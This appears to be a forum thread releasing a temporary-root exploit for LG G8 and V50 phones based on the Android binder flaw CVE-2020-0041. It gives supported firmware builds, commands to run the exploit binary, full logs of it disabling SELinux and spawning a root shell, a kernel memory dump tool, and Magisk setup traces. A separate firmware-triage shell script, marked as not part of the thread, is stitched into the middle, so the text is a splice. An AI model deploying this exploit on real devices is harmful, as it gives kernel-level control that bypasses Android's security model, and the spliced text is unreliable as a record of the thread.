    • LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1 - Sprint G8 fw 20d
    • LMG820AT-00-V20d-LAO-COM-JAN-29-2020-ARB00+0 - T-Mobile US G8 January 2020 security patch
    • LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0 - Sprint G8 fw 20e February 2020 patch
    • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5 - Verizon G8 fw 20a
    • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0 - AT&T G8 fw 20i
    • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0 - AT&T G8 G820UM fw 20j
    • LMG820AT-00-V21b-LAO-COM-FEB-05-2020-ARB00+1 - Amazon G8 (G820QM821b_01_AMZ_US_OP_0205)
    Please note, it is unlikely that any fw version other than those listed above would work.
    The only (unlikely) case in which the exploit could work with a different fw version (or a different phone model) would be if it used a binary identical kernel image in the firmware.

    USAGE HOWTO
    • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
    • enable developer options and in there adb debugging (install adb drivers if needed)
    • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
    • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      chmod 755 ./v50g8-mroot3
      ./v50g8-mroot3

    If it worked, you should see something like this:
    Code:
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    ...
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    Permissive
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root) context=kernel
    root_by_cve-2020-0041:/data/local/tmp #

    In case you get 'target is not supported', you may list supported targets with
    Code:
    ./v50g8-mroot3 -T
    and try to force one close to yours using '-t num' option.

    Please see the 2nd post for magisk setup from temp root details.

    Please be careful what you use the temp root for.
    Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), for example /system, /vendor or the kernel boot partition, can result in a phone that no longer boots.
    In such a case you would need a way to emergency flash stock firmware to recover.
    This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with a reboot and it does not allow making permanent changes in crucial partitions until bootloader unlock is achieved.
    Some partitions might still be possible to modify - for example in the case of Sony Xperia phones it was possible to do a permanent debloat via changes in the /oem partition, and such a debloat would survive even a factory reset. Similarly, some modem configs have been present in /oem allowing to set up IMS for different operators/regions or tune other modem related stuff.

    SOURCES
    Exploit sources for all releases are available at my github here.

    CREDITS
    Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

    MEMORY DUMP FOR NEW TARGETS
    I have implemented a tool that dumps kernel space memory to a file, with the aim of hopefully being able to analyse it to add support for a new target that does not have downloadable firmware.
    You can start it similarly as done with v50g8-mroot3, including the '-t num' option.

    Use this tool only in case your phone is not supported but it is exploitable (i.e. v50g8-mroot3 does something reasonable with any '-t num' option, including a crash/reboot of the phone).
    When v50g8-mroot3 says "target is not supported", use 'v50g8-mroot3 -T' to list supported targets and then 'v50g8-mroot3 -t num' changing num to each one of listed targets, one by one.
    Watch the output log to see which is the most successful (the longest reasonable output if you do not count looping/repeating the same lines).

    Having found the closest target this way, remember the '-t num' option and use it with v50g8-dump.
    The tool hopefully creates the /data/local/tmp/memdump.bin file and then sleeps indefinitely.
    Just open another cmd window and use
    Code:
    adb pull /data/local/tmp/memdump.bin
    to get the file to your PC, compress it to an archive and post it here - it may help to add support for a new target which does not have a downloadable fw, like for example the Sprint models.

    DONATIONS
    If you like my work, you can donate using the Donate to Me button with several methods there.

    Already donated:
    Thank you very much to all who donated or are about to donate.

    DOWNLOAD
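    The SUPPORTED TARGETS list above is the only thing that tells an administrator whether a given G8 build is exposed to this tool. The following POSIX sh script is an added example, not part of this thread or of the v50g8-mroot3 release: it parses a 'ro.vendor.lge.factoryversion' string, compares its build date with the newest listed target, and classifies the device for fleet triage. The target list is copied from the post; the classification labels and the build-date heuristic are this example's own assumptions.

```sh
#!/bin/sh
# Added example, not part of the thread or the v50g8-mroot3 release: fleet
# triage of LG G8 firmware identifiers against the SUPPORTED TARGETS list.
# Input is the value of 'getprop ro.vendor.lge.factoryversion', e.g.
#   LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
# The target list below is copied from the post; the classification labels
# and the build-date heuristic are this example's own assumptions.

G8_TARGETS='
LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
LMG820AT-00-V20a-LAO-COM-NOV-25-2019-ARB00+0
LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1
LMG820AT-00-V20d-LAO-COM-JAN-29-2020-ARB00+0
LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0
LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5
LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0
LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0
LMG820AT-00-V21b-LAO-COM-FEB-05-2020-ARB00+1
'

# Pull the MON-DD-YYYY build date out of a factoryversion string and print it
# as YYYYMMDD so that dates can be compared as plain integers.
fv_build_date() {
    _d=$(printf '%s\n' "$1" |
        sed -n 's/.*-\([A-Z][A-Z][A-Z]\)-\([0-9][0-9]\)-\([0-9]\{4\}\).*/\1 \2 \3/p')
    [ -n "$_d" ] || return 1
    set -- $_d                       # $1=MON $2=DD $3=YYYY
    case $1 in
        JAN) _m=01 ;; FEB) _m=02 ;; MAR) _m=03 ;; APR) _m=04 ;;
        MAY) _m=05 ;; JUN) _m=06 ;; JUL) _m=07 ;; AUG) _m=08 ;;
        SEP) _m=09 ;; OCT) _m=10 ;; NOV) _m=11 ;; DEC) _m=12 ;;
        *) return 1 ;;
    esac
    printf '%s%s%s\n' "$3" "$_m" "$2"
}

# Newest build date among the listed targets (the end of the tested window).
fv_newest_known() {
    for _t in $G8_TARGETS; do fv_build_date "$_t"; done | sort -n | tail -n 1
}

# Classify one factoryversion:
#   listed             exact match, the posted tool is known to work
#   same-era-untested  not listed, but built no later than the newest listed
#                      target, so treat it as exposed until proven otherwise
#   newer-than-tested  built after the tested window
#   unparseable        no recognisable build date in the string
fv_classify() {
    for _t in $G8_TARGETS; do
        if [ "$_t" = "$1" ]; then echo listed; return 0; fi
    done
    _d=$(fv_build_date "$1") || { echo unparseable; return 0; }
    if [ "$_d" -le "$(fv_newest_known)" ]; then
        echo same-era-untested
    else
        echo newer-than-tested
    fi
}

# Stand-alone use on the device: sh fv_triage.sh "$(getprop ro.vendor.lge.factoryversion)"
if [ $# -eq 1 ]; then fv_classify "$1"; fi
```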
    MAGISK SETUP FROM TEMP ROOT WITH LOCKED BOOTLOADER
    To enjoy the temporal root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
    • download the v50g8-mroot3.zip with the exploit attached in the first post
    • download Magisk-v20.4.zip from magisk releases page on github here
    • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
    • unzip and prepare magisk setup with the following commands in 'adb shell'
      Code:
      cd /data/local/tmp
      unzip v50g8-mroot3.zip
      chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
      ./magisk-setup.sh
    • get temp root and start magisk up with the following commands in 'adb shell':
      Code:
      cd /data/local/tmp
      ./v50g8-mroot3
      ./magisk-start.sh -1
      ./magisk-start.sh -2
      ./magisk-start.sh -3
      Only this step needs to be done after each reboot to get magisk running again.
      NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
      There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with the -1 and/or -2 stuff in a single script run resulted in a reboot most of the time.
      Phases 2 and 3 need to be split for functional reasons to start magisk with working su permission asking notification.

    If it worked, you should see something like this:

    Code:
    alphalm:/ $ cd /data/local/tmp
    alphalm:/data/local/tmp $ ./v50g8-mroot3
    [+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
    [+] Mapped 200000
    [+] selinux_enforcing before exploit: 1
    [+] pipe file: 0xffffffd07822fa00
    [+] file epitem at ffffffd102da6d00
    [+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
    [+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
    [+] Write done, should have arbitrary read now.
    [+] file operations: ffffff9dee01ebf8
    [+] kernel base: ffffff9dece80000
    [+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
    [+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
    [+] init_cred: ffffff9def02fcd0
    [+] memstart_addr: 0xfffffff040000000
    [+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
    [+] Second level entry: ae419003 -> next table at ffffffd06e419000
    [+] sysctl_table_root = ffffff9def05c710
    [+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
    [+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
    [+] Injected sysctl node!
    [+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Replaced sendmmsg dangling reference
    [+] Cleaned up sendmsg threads
    [+] epitem.next = ffffffd07822fa20
    [+] epitem.prev = ffffffd07822fad8
    [+] Launching privileged shell
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
    + FRESH=false 
    + '[' -1 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + ./magiskpolicy --live --magisk 'allow dumpstate * * *'
    Load policy from: /sys/fs/selinux/policy
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
    + FRESH=false 
    + '[' -2 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=2 
    + '[' 2 '=' 2 ']'
    + mount -t tmpfs -o 'mode=755' none /sbin
    + chcon u:object_r:rootfs:s0 /sbin
    + chmod 755 /sbin
    + cp -a magisk/boot_patch.sh /sbin
    + cp -a magisk/magiskboot /sbin
    + cp -a magisk/magiskinit64 /sbin
    + cp -a magisk/busybox /sbin
    + cp -a magisk/util_functions.sh /sbin
    + cd /sbin
    + chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
    + mkdir r
    + mount -o bind / r
    + cp -a r/sbin/. /sbin
    + umount r
    + rmdir r
    + mv magiskinit64 magiskinit
    + ./magiskinit -x magisk magisk
    + ln -s /sbin/magiskinit /sbin/magiskpolicy
    + ln -s /sbin/magiskinit /sbin/supolicy
    + false
    + chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
    + rm -f magiskboot util_functions.sh boot_patch.sh
    + ln -s /sbin/magisk /sbin/su
    + ln -s /sbin/magisk /sbin/resetprop
    + ln -s /sbin/magisk /sbin/magiskhide
    + mkdir /sbin/.magisk
    + chmod 755 /sbin/.magisk
    + >/sbin/.magisk/config 
    + echo 'KEEPVERITY=true'
    + >>/sbin/.magisk/config 
    + echo 'KEEPFORCEENCRYPT=true'
    + chmod 000 /sbin/.magisk/config
    + mkdir -p /sbin/.magisk/busybox
    + chmod 755 /sbin/.magisk/busybox
    + mv busybox /sbin/.magisk/busybox
    + mkdir -p /sbin/.magisk/mirror
    + chmod 000 /sbin/.magisk/mirror
    + mkdir -p /sbin/.magisk/block
    + chmod 000 /sbin/.magisk/block
    + mkdir -p /sbin/.magisk/modules
    + chmod 755 /sbin/.magisk/modules
    + mkdir -p /data/adb/modules
    + chmod 755 /data/adb/modules
    + mkdir -p /data/adb/post-fs-data.d
    + chmod 755 /data/adb/post-fs-data.d
    + mkdir -p /data/adb/service.d
    + chmod 755 /data/adb/service.d
    + chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
    + chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
    + /sbin/magisk --daemon
    client: launching new main daemon process
    + pidof magiskd
    + MP=14148 
    + '[' -z 14148 ']'
    + >/sbin/.magisk/escalate 
    + echo 14148
    + '[' -e /sbin/.magisk/escalate ']'
    + sleep 1
    + '[' -e /sbin/.magisk/escalate ']'
    root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
    + FRESH=false 
    + '[' -3 '=' --fresh ']'
    + '[' ! -e /data/adb/magisk/busybox ']'
    + STAGE=3 
    + '[' 3 '=' 2 ']'
    + >/sbin/.magisk/magiskd 
    + echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
    + chmod 755 /sbin/.magisk/magiskd
    + chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
    + getprop init.svc.dumpstate
    + SVC='' 
    + timeout=10 
    + '[' 10 -gt 0 ']'
    + stop dumpstate
    + killall -9 magiskd
    + stop dumpstate
    + mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
    + start dumpstate
    + timeout=10 
    + '[' 10 -le 0 ']'
    + pidof magiskd
    + MP=14165 
    + '[' -n 14165 ']'
    + break
    + stop dumpstate
    + sleep 1
    + umount /system/bin/dumpstate
    + rm -f /sbin/.magisk/magiskd
    + '[' '' '=' running ']'
    + rm -f /dev/.magisk_unblock
    + /sbin/magisk --post-fs-data
    + timeout=10 
    + '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
    + sleep 1
    + timeout=9 
    + '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
    + /sbin/magisk --service
    + sleep 1
    + /sbin/magisk --boot-complete
    + chmod 751 /sbin
    root_by_cve-2020-0041:/data/local/tmp # id
    uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
    root_by_cve-2020-0041:/data/local/tmp # uname -a
    Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
    root_by_cve-2020-0041:/data/local/tmp # getenforce
    Permissive

    Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager, or allow other apps that need root, as asking for root permission now works.
    You can even re-enable selinux like this from 'adb shell':
    Code:
    su -c 'setenforce 1'
    The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

    TIPS FOR BETTER STABILITY OF THE EXPLOIT
    The exploit is based on a use-after-free, which means it depends on the state of the memory heap and how it changes while the exploit runs.
    That means there is some portion of unpredictability and a chance that something other than hoped for gets overwritten when shaping the heap.
    So to get best results, one should stop anything that could run in background, like:
    • set airplane mode, turn off wifi and bluetooth so there is no data connection at all
    • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
    • disable auto updates of system and apps
    • debloat your system so useless apps do not run in background
    • reboot your phone having all the above
    • wait two minutes after boot-up with the phone unlocked, screen on, connected to the PC via USB cable and with 'adb shell' already active (check with the 'uptime' command)
    • start the exploit
    • after getting the root shell and successfully starting magisk, do not forget to properly exit the temp root shell by using the 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of the clean up

    CHANGELOG
    • 2020-05-16 : multiple targets supported (v50g8-root)
    • 2020-05-20 : added v50g8-dump tool to dump kernel space memory
    • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for 4 new G8 targets (3 x Sprint and one T-Mobile US)
    • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, added support for 3 new G8 targets (Verizon and 2 x AT&T), released as v50g8-mroot2
    • 2020-06-23 : added support for Amazon G8 target and hopefully fixed not getting a root shell problem with mroot2 on G8, released as v50g8-mroot3
    temp root updated for 3 new G8 targets

    Added support for one Verizon G8 and two AT&T G8 targets:
    • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5
    • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0
    • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0
    Also includes changes to make the root shell more stable (should fix issues with V50 but hopefully G8 could benefit too).
    Released as v50g8-mroot2.zip available in the first post.

    @firedroidx, @Shryvone21, @TPMJB
    Please test and confirm if it works here as this build had not been tested.
    @py0zz1, I wonder why you are working on a G8 exploit while it is already available in this thread?
    As stated in OP, I will put it on github later. It is not ready yet, some Sprint V50 users complain about immediate reboot after getting a root shell so it can't be used. It is still work in progress. After it is finished, I will need to clean up the code removing lots of my unneeded debug and test stuff before releasing it.
    Bootloader unlock and magisk working on Sprint g8!!! Unfortunately after 2 people bricked, but now we know what to do.
    Sent you a donation for your work. Thank you!